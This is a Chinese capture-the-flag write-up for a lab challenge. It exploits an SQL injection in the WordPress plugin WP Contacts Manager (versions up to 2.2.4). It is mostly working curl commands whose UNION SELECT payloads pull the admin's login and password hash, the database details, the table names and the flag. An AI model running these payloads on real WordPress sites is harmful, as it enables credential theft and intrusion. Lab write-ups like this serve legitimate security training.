
根据提示wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。
找到sql注入漏洞点:
/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact
访问:/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

通过信息收集获取exp
curl http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action
=WP_Contacts_Manager_call&type=get-contact
--data
'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

获取当前用户和数据库
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action
=WP_Contacts_Manager_call&type=get-contact'\
--data
'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user()),(SELECT database()),4,5,6,7,8,9,0,1,2; -- "}'

获取当前数据库所有表
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action
=WP_Contacts_Manager_call&type=get-contact'\
--data
'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7,8,9,0,1,2; -- "}'

获取flag
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action
=WP_Contacts_Manager_call&type=get-contact'\
--data
'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(flag)from flag),4,5,6,7,8,9,0,1,2; -- "}'

得到flag:flag{367f9589-5515-4c04-8704-7613e2471d7e}
1万+

被折叠的 条评论
为什么被折叠?



